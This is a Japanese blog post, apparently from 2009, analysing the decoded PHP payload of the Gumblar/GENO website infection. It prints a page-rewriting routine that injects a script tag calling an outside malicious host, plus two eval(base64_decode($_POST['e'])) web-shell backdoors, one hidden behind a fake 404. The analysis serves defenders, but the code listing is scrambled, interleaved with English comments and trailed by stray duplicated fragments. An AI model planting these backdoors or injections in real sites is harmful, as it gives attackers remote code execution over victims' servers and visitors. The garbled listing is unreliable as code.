１０月９日ごろに発生した、新種のPHPのウイルス 「Gumblar.x」「JSRedir-R」（通称、GENOウイルス） の「やられ２群」の挙動についての、続報です。 なお、 をご覧下さい。 ＜追記＞ PHPのコードのインデントがおかしいのを修正いたしました。　(09/10/30) PHPに感染するコードは２種類あります。ともに base64エンコードされて難読化されています。 デコードしたものを示しますと次のようなものです： if(!isset($a1i81)) {
// Decoded PHP-side payload of the Gumblar/"GENO" infection, as pasted on this page.
// The listing has been line-scrambled by the blog renderer (braces and regex fragments
// are out of order; one iframe pattern is split into the `(http` and `?//` pieces below),
// so it will NOT parse as-is. The comments describe what the visible statements do, for
// triage and detection only. Handy static indicators visible in this listing:
//   ob_start('a1i8'), set_error_handler('a1i82'), eval(base64_decode($_POST['e']))
//   (the last line of the listing, shown after this block on the page), and the base64
//   literal in the str_replace() call below, which the page decodes to a <script src=…> tag.
//
// a1i8(): output-buffer callback. Receives the buffered page HTML $s, rewrites it and
// returns it, so it runs on every response once installed via ob_start('a1i8').
function a1i8($s) {
}
// Collect every <script>…</script> block in the response.
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
}
foreach($a[0] as $v)
// Also collect <iframe … src=http…> tags; the regex continues on the `?//` line below.
if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http
// Heuristic for "obfuscated" script blocks: more than 5 lines, plus ($e) a 30+ char run
// without quotes/whitespace/punctuation or a 20+ element numeric array literal …
if(count(explode("\n",$v))>5) {
$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\
} ]{30,}#',$v) || preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v) && ($e || strpos($v,'fromCharCode'))) || ($e&&strpos($v,'document.write')))
// … combined with eval / fromCharCode / document.write: such blocks are deleted from
// the output (i.e. competing injections are stripped).
$s=str_replace($v,'',$s);
?//([^>]*?)>#is',$s,$a))
foreach($a[0] as $v)
// Remove any existing copy of the payload's own <script src=…> tag (kept base64-encoded
// here; the page shows the decoded tag/host below) before re-inserting it further down.
$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2luY2FicmFzaWwub3JnLmJyL2FkbWluL3VwbG9hZF9pbWFnZW5zL2FkbWluc3VwZXJuZXdzLnBocCA+PC9zY3JpcHQ+'),'',$s);
// Hidden iframes (width 0/1 or display:none) that are not PHP-generated (`?>` check)
// are cut out of the response together with their closing </iframe>.
if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v) && !strstr($v,'?'.'>'))
$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);
// Inject the decoded tag ($a) right before <body>; otherwise append it when the output
// contains ',a' (what that substring is meant to detect is not clear from this listing).
if(stristr($s,'<body'))
$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);
elseif(strpos($s,',a'))
$s.=$a;return $s;
// a1i82(): error-handler wrapper installed by set_error_handler('a1i82') (last line on the
// page). It chains to the previously installed handler saved in global $a1i81 and then
// rebuilds the output-buffer stack so that a1i8 sits underneath every other buffer.
function a1i82($a,$b,$c,$d) {
global $a1i81;
}$s=array(); if(function_exists($a1i81))
call_user_func($a1i81,$a,$b,$c,$d);
// Walk the active output buffers: bail out if a1i8 is already installed, stop at
// ob_gzhandler, otherwise remember each handler name (the default handler becomes false)
// and capture its current contents.
foreach(@ob_get_status(1) as $v)
if(($a=$v['name'])=='a1i8')
for($i=count($s)-1;$i>=0;$i--){
return;
elseif($a=='ob_gzhandler')
break;
else
$s[]=array($a=='default output handler'?false:$a);
$s[$i][1]=ob_get_contents();
// Discard the captured buffers, start a new one with a1i8 at the bottom, then re-create
// the original handlers on top and replay their captured contents.
}ob_end_clean(); ob_start('a1i8'); for($i=0;$i<count($s);$i++){
ob_start($s[$i][0]);
}echo $s[$i][1]; $a1i8l=(($a=@set_error_handler('a1i82'))!='a1i82')?$a:0; eval(base64_decode($_POST['e'])); ずらずら、ありますが、実は、関数を定義しているだけです。 本体は、最後の２行だけです。 もっといえば、実際の動作をする部分は、一番最後の行 　eval(base64_decode($_POST['e'])); なのです。 この行は、 　　POST メソッドで、この php ファイルが呼ばれた際に、
というものです。　　FORMの eのパラメータに書かれている phpのコードを(base64エンコードしてあるのを戻して） 　　「そのまま実行せよ」 ようするに、任意の php のコードを実行する というコードです。 おそらく、そのコードの中から、ここで定義した２つの関数、 　　function a1i8($s) 　　function a1i82($a,$b,$c,$d) がよびだされ、変数である 　　$a1i8l が利用される、という風になっているものと思われます。 なお、 base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2luY2FicmFzaWwub3JnLmJyL2FkbWluL3VwbG9hZF9pbWFnZW5zL2FkbWluc3VwZXJuZXdzLnBocCA+PC9zY3JpcHQ+')
の部分は、デコードすると、<script src=ｈｔｔｐ://incabrasil.org.br/admin/upload_imagens/adminsupernews.php ></script>
となっています。gifimg.php というファイルの中身も、base64 エンコードされていますが、その中身は < ? php if(isset($_POST['e']))eval(base64_decode($_POST['e']));else die('404 Not Found'); ?>
というものです。これは、通常は、ファイルが見当たらないという、404エラーを出しておき、　　POST メソッドで、この php ファイルが呼ばれた際に、
というものです。　　FORMの eのパラメータがある場合だけ、 　　FORMの eのパラメータに書かれている phpのコードを(base64エンコードしてあるのを戻して） 　　「そのまま実行せよ」 これも、任意の php のコードを実行する というコードです。 これら２つのコードから言えることは、 　・実際のサーバー内のファイル書き換えを実行するコードは、この中にないということ 　・外部から任意の php のコードを実行できるコードが埋め込まれているということ の２点です。 実際の挙動には、logファイルなどから、POSTメソッドのパラメータ を確認せねばなりません。 しかし、通常logファイルには、POSTメソッドのパラメータは、残していないと・・・ 　　なかなか　やるな
※Base64のデコードには、 　　　http://hogehoge.tk/tool/ を使いました。WEB上のフォームで、デコードしてくれます。
]{30,}#',$v) || preg_match('#[\(\[](\s*\d+,){20,}#',$v);
?//([^>]*?)>#is',$s,$a))



